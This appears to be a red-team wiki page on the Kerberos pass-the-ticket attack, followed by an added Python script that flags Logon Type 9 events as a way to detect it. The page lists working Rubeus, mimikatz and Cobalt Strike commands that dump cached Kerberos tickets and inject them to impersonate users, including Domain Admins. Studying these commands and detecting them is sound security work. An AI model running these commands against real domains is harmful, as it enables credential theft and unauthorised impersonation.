Pass the Ticket - CraigDonkin/Infrastructure GitHub Wiki
- Pass the ticket attack.
- Impersonating users on an AD domain.
- Adds Kerberos tickets to a logon session.
- A logon session can only hold 1 ticket at a time, so it's best to create a dedicated logon session to use for this.
- Creating a new logon session requires that you have already obtained elevated privileges.
- Create a new process
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
- Pass a TGT into the new LUID
Rubeus.exe ptt /luid:<luid> /ticket:<ticket>
- If using Cobalt Strike (CS), steal_token can be used to impersonate the process created in the first step.
- Use mimikatz to get all the kerberos tickets
- Check to see if there are any Kerberos tickets for the Domain Admin (DA).
- The KRBTGT (TGT) tickets, which might be cached, are the ones we want.
privilege::debug
sekurlsa::tickets /export
Have a look through the tickets
To reuse a ticket:
privilege::debug
kerberos::ptt ticket.kirbi
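Added defender-side example, not from the wiki: the createnetonly step above starts a process under a new logon session, and Windows records that as a 4624 event with Logon Type 9 (NewCredentials), the same event `runas /netonly` produces. The script parses constructed JSON-lines 4624 records, lists each type-9 logon with the LUID it created and the creating process, and marks processes on a baseline allowlist (the allowlist contents are an assumption) so the remaining LUIDs can be reviewed with `klist -li <luid>`.

```python
import json

# Constructed JSON-lines sample (not a real host's log). Event 4624 with
# LogonType 9 (NewCredentials) is what Windows records when a process is
# started with CreateProcessWithLogonW and LOGON_NETCREDENTIALS_ONLY, the
# path taken by "runas /netonly" and by Rubeus createnetonly.
SAMPLE_LOG = r"""
{"EventID": 4624, "LogonType": 2, "TargetUserName": "alice", "TargetLogonId": "0x3e7a1", "ProcessName": "C:\\Windows\\System32\\winlogon.exe"}
{"EventID": 4624, "LogonType": 9, "TargetUserName": "alice", "TargetLogonId": "0x4f0c2", "ProcessName": "C:\\Users\\alice\\Downloads\\tool.exe"}
{"EventID": 4624, "LogonType": 9, "TargetUserName": "bob", "TargetLogonId": "0x5a113", "ProcessName": "C:\\Windows\\System32\\runas.exe"}
not json at all
{"EventID": 4672, "TargetUserName": "alice"}
"""

# Process paths baselined as legitimate sources of type-9 logons.
# Assumption for this example; tune per environment.
BASELINED_PROCESSES = {r"c:\windows\system32\runas.exe"}


def parse_events(text):
    """Parse JSON-lines event records, skipping blank or malformed lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def find_new_credential_logons(events):
    """Return every 4624 / LogonType 9 record as a finding: the LUID the
    logon created, the account it runs as, the creating process, and
    whether that process is on the baseline allowlist."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4624 or ev.get("LogonType") != 9:
            continue
        proc = ev.get("ProcessName", "")
        findings.append({
            "luid": ev.get("TargetLogonId"),
            "user": ev.get("TargetUserName"),
            "process": proc,
            "baselined": proc.lower() in BASELINED_PROCESSES,
        })
    return findings


def suspicious_luids(events):
    """LUIDs of non-baselined type-9 logons; these sessions' cached
    tickets (klist -li <luid>) are the ones worth reviewing."""
    return [f["luid"] for f in find_new_credential_logons(events) if not f["baselined"]]


if __name__ == "__main__":
    for finding in find_new_credential_logons(parse_events(SAMPLE_LOG)):
        print(finding)
```

Logon Type 9 is also produced by legitimate `runas /netonly` use, so treat the output as a review queue rather than an alert on its own.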